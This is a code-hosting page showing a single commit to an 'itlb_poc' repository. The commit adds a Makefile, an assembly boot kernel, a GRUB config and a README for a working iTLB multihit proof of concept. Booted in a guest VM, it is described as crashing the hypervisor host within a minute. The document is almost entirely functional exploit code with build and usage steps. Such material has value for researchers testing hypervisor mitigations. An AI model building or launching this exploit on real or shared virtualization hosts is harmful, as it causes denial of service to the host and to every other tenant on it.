crash.software
Projects
Pull Requests
Issues
Builds
itlb_poc
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY itlb_poc Commits a7e00723
🤬

  • Add PoC for hypervisors with BIOS/EFI

  • Loading...
  • dan committed 1 year ago
    a7e00723
    1 parent 2a871cb3
  • ■ ■ ■ ■ ■ ■
    Makefile
     1 +MKRESCUE = /usr/bin/grub-mkrescue
     2 +GRUB_EFI_FLAGS = -d /usr/lib/grub/x86_64-efi/
     3 +GRUB_BIOS_FLAGS = -d /usr/lib/grub/i386-pc/
     4 +OBJECTS = bootstrap.o
     5 + 
     6 +all: poc_efi.iso poc_bios.iso
     7 + 
     8 +bootstrap.o : bootstrap.asm
     9 + nasm -felf64 $< -o $@
     10 + 
     11 +poc_efi.iso: iso/boot/kernel
     12 + $(MKRESCUE) $(GRUB_EFI_FLAGS) -o $@ iso
     13 + 
     14 +poc_bios.iso: iso/boot/kernel
     15 + $(MKRESCUE) $(GRUB_BIOS_FLAGS) -o $@ iso
     16 + 
     17 +iso/boot/kernel: $(OBJECTS)
     18 + $(LD) -melf_x86_64 --section-start=".ap_code"=0x01000000 $^ -o $@
     19 + 
     20 +clean:
     21 + rm -f *.o iso/boot/kernel *.iso
     22 + 
     23 + 
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # itlb_poc
    2 2  iTLB multihit PoC
    3 3   
     4 + 
     5 +## How to use
     6 +- For most hypervisors (and Gen1 on hyper-v): create a VM with a bootable disk pointing to `poc_bios.iso`.
     7 +- For Gen2 hyper-v: create a VM with *secure boot* disabled, and a bootable disk poiting to `poc_efi.iso`.
     8 + 
     9 +Launching the VM should crash the host in less than a minute.
     10 + 
     11 +Btw, to avoid some extra fun disable automatic start for VMs.
     12 + 
     13 + 
     14 + 
  • ■ ■ ■ ■ ■ ■
    bootstrap.asm
     1 +;; SPDX-FileCopyrightText: 2022 TACITO SECURITY <[email protected]>
     2 +;; SPDX-License-Identifier: GPL-3.0-or-later
     3 +global _start
     4 +[bits 32]
     5 + 
     6 +[section .bss]
     7 +align 0x1000
     8 +pt: resb 0x1000 ; 1 PT (mirror)
     9 +pd: resb 0x1000 ; 1 PDs
     10 +pdpt: resb 0x1000 ; 1 PDPT
     11 +pml4: resb 0x1000 ; 1 PML
     12 + 
     13 +[section .data]
     14 +gdt: ; minimal 64-bit GDT
     15 +dq 0x0000000000000000
     16 +dq 0x00A09b000000ffff ; kernel CS
     17 +dq 0x00C093000000ffff ; kernel DS
     18 +gdt_end: ; TODO: TSS
     19 +gdtr:
     20 +dw gdt_end - gdt - 1 ; GDT limit
     21 +dq gdt ; GDT base
     22 + 
     23 +[section .text]
     24 +align 8, db 0
     25 +;; multiboot2 header
     26 +mb_header_size equ (mb_header_end - mb_header)
     27 +mb_header:
     28 +dd 0xE85250D6 ; magic field
     29 +dd 0 ; architecture field: i386 32-bit protected-mode
     30 +dd mb_header_size ; header length field
     31 +dd 0xffffffff & -(0xE85250D6 + mb_header_size) ; checksum field
     32 +;; termination tag
     33 +dw 0 ; tag type
     34 +dw 0 ; tag flags
     35 +dd 8 ; tag size
     36 +mb_header_end:
     37 +;; kernel code starts here
     38 +_start:
     39 +mov edi, pt
     40 +mov ecx, 512
     41 +mov eax, 0x01200003
     42 +init_pte:
     43 +mov dword [edi], eax
     44 +add eax, 0x1000
     45 +add edi, 8
     46 +dec ecx
     47 +jnz init_pte
     48 +mov edi, pd
     49 +mov ecx, 512
     50 +mov eax, 0x83; + 0x40;0x60
     51 +init_pde:
     52 +mov dword [edi], eax
     53 +add eax, 0x200000
     54 +add edi, 8
     55 +dec ecx
     56 +jnz init_pde
     57 +mov dword [pdpt], pd + 3
     58 +mov dword [pdpt+0x08], pd + 0x1003
     59 +mov dword [pdpt+0x10], pd + 0x2003
     60 +mov dword [pdpt+0x18], pd + 0x3003
     61 +mov dword [pml4], pdpt + 3
     62 +init_long_mode:
     63 +mov eax, pml4
     64 +cld
     65 +;; load page-tables
     66 +mov cr3, eax
     67 +mov ecx, 0xC0000080
     68 +rdmsr
     69 +or eax, 0x101 ; LME | SCE
     70 +wrmsr ; set EFER
     71 +lgdt [gdtr] ; load 64-bit GDT
     72 +mov eax, 0x1ba ; PVI | DE | PSE | PAE | PGE | PCE
     73 +mov cr4, eax
     74 +mov eax, 0x8000003b ; PG | PE | MP | TS | ET | NE
     75 +mov cr0, eax
     76 +jmp 0x08:code64
     77 +[bits 64]
     78 +code64:
     79 +mov ax, 0x10
     80 +mov ds, ax
     81 +mov es, ax
     82 +mov ss, ax
     83 +mov rdi, 0x01100000
     84 +fill:
     85 +mov word [rdi], 0xE3FF ; jmp rbx
     86 +mov word [rdi+2], 0x0000
     87 +sfence
     88 +clflush [rdi]
     89 +add rdi, 0x1000
     90 +cmp rdi, 0x01200000
     91 +jnz fill
     92 +mov rsi, 0x01000000
     93 +mov rcx, 0x200000
     94 +rep movsb
     95 +mov rdi, 0x01100000
     96 +jnz fill
     97 +fill2:
     98 +clflush [rdi]
     99 +add rdi, 0x1000
     100 +cmp rdi, 0x01400000
     101 +jnz fill2
     102 +jmp call_ap
     103 + 
     104 +[section .ap_code]
     105 +call_ap:
     106 +reset:
     107 +mov rax, 0x01100000
     108 +next:
     109 +add rax, 0x1000
     110 +cmp rax, 0x01200000
     111 +jz reset
     112 +lea rbx, [rel return]
     113 +mov qword [pd + 64], 0x01000083
     114 +mfence
     115 +add ax, word [rax+2]
     116 +jmp rax
     117 +return:
     118 +sfence
     119 +mov qword [pd + 64], pt + 3
     120 +sfence
     121 +add [rax], al
     122 +jmp next
     123 + 
     124 + 
  • ■ ■ ■ ■ ■
    iso/boot/grub/grub.cfg
     1 +set timeout=0
     2 +set default=0
     3 +multiboot2 /boot/kernel
     4 +boot
     5 + 
  • poc_bios.iso
    Binary file.
  • poc_efi.iso
    Binary file.
Please wait...
Page is in error, reload to recover